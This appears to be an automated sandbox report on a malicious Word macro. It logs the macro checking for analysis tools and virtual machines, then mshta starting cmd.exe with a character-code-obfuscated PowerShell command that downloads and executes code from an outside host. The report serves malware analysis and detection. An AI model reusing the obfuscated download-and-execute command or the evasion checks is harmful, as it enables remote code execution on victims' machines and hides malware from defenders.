Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmware") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vxstream") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","autoit") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtools") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","tcpview") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","process explorer") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hacker") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","malzilla") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","procexp") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","wireshark") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hxd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","powershell_ise") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","ida") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","olly") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","fiddler") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","swingbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vboxtray") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","secunia") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hijack") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vbox") | Name: KYEPC270 |
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmware") | Name: KYEPC270 |
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tracing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Tracing.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformation | Jump to behavior |